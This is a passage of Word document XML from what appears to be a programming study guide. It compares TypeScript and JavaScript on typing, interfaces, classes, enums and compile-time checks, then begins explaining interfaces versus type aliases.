    <w:p w14:paraId="636B9233"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age = "thirty"; // Error: Type 'string' is not assignable to type 'number'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D49A93"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JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Uses dynamic typing. Variables can hold any type of value, and types are checked at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673AD064"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621E41B"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age = 30;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D38BE4A"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age = "thirty"; // No error, but may cause issues at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E91EF6" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55836E"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TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Allows type annotations for variables, function parameters, return values, and object properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619FF86A"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40566D0"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greet(name: string): string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4623A9"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`Hello, ${name}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D2F77E"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F6D623C"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JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Does not support type annotations. Type information is inferred dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425E59E2"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22A67B82"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greet(name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DCF9CC"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`Hello, ${name}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23680391"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85DA033" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interfaces and Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD7AC27"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TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides interfaces and type aliases to define complex types, structures, and contracts in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF43606"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05FEEAFE"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F89BB1D"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01DBFACA"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6F30D426"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F479B8F"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927A121"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john: Person = { name: "John", age: 25 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D4335"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JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Lacks built-in support for defining interfaces or types. You use objects and constructor functions to achieve similar functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E82863"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282AF71A"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createPerson(name, age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356774A"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 name, age };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B195D"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B78E990"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8A51EFD"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john = createPerson("John", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2BC67" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Classes and Access Modifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22BC39"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TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enhances JavaScript classes with access modifiers like public, private, and protected. It also supports abstract classes and interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B9379"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14DF7FAA"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3159D3"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private name: string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494FCEEA"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5C1C9FE"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constructor(name: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EC6BA"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CAA2EA"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2D8C093"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060B1E0"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public getName(): string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7894BC7B"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this.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0FC047"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0505EE6"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655882E"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JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides classes but does not support access modifiers. Encapsulation is typically achieved through closures or other patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A561266"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1300DDD0"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A348E"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constructor(name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEE3B4"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C027277"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4EE25A9"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F27837D"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getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC03A3"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this.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E546B04"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79A5A63"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78A4B07" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D14D2"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lastRenderedPageBreak/>
        <w:t>TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supports enums, which are a way to define a set of named constants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C4AEDB"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36E05529"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enum Color {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FC668"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Red,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB6CAE"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Green,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E53471"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Blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1995BD"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6924076"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3BFCFAC"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let favoriteColor: Color = Color.Green;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EED67"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JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Does not have built-in support for enums. You typically use objects or constants to achieve similar functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26363BE5"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0DC64F14"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Color = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD457A9"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Red: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C339402"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Green: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1F19D"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Blue: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EC244"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64F8750"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406F561" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16"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let favoriteColor = Color.Green;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A008AF7" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compile-Time Error Checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E001F8"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TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Performs compile-time checks to catch type errors and other issues before the code runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B85192"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17629EB4" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16"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let num: number = "hello"; // Error at compile time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F242D" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Errors are detected at runtime, which can make debugging more challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCBA272" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C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0E7C5E42" w14:textId="77777777" w:rsidR="00081C16" w:rsidRPr="00DA2F32" w:rsidRDefault="00081C16"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let num = "hello"; // No error at compile time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C90C8" w14:textId="77777777" w:rsidR="0002063F" w:rsidRPr="00DA2F32" w:rsidRDefault="0002063F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C532A8" w14:textId="5B5B3454" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc178383285"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are the differences between interfaces and type aliases in TypeScript?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="60D7AE19" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Basic Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3ED344" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BBDE7" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Used to define the shape of objects and can be extended or implemented by classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F13DD4" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can be used to define the structure of an object, including its properties and methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665067F4"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0D674"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5C1FFFAC"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52A05A07"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CAA91A3" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A204E9" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Used to create a new name for any type, including primitive types, object types, unions, intersections, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A351A8" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can represent complex types including objects, unions, intersections, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE139E5"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Person = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76CFB2"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6F0AC0C5"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0A922EFE"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5218FA1" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Extending and Implementing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FE6A9" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290ACB3" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Supports extending other interfaces and can be implemented by classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E178F" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interfaces can be extended using the extends keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F1919"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Employee extends Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7822A7B3"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employeeId: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64887323"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1B60252"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E83E041"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Manager implements Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443ED6A2"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39BCE775"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1F084ED8"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employeeId: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC5780E"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E9B84C8"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constructor(name: string, age: number, employeeId: number) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41C261"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CAAEEB"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this.age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5699A"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this.employeeId = employeeId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED118ED"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6B63017"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65F9CB9" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C5226" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can create new types using intersections and unions, but does not support the implements keyword directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB8800D" w14:textId="77777777" w:rsidR="005C48EF" w:rsidRPr="00DA2F32" w:rsidRDefault="005C48EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
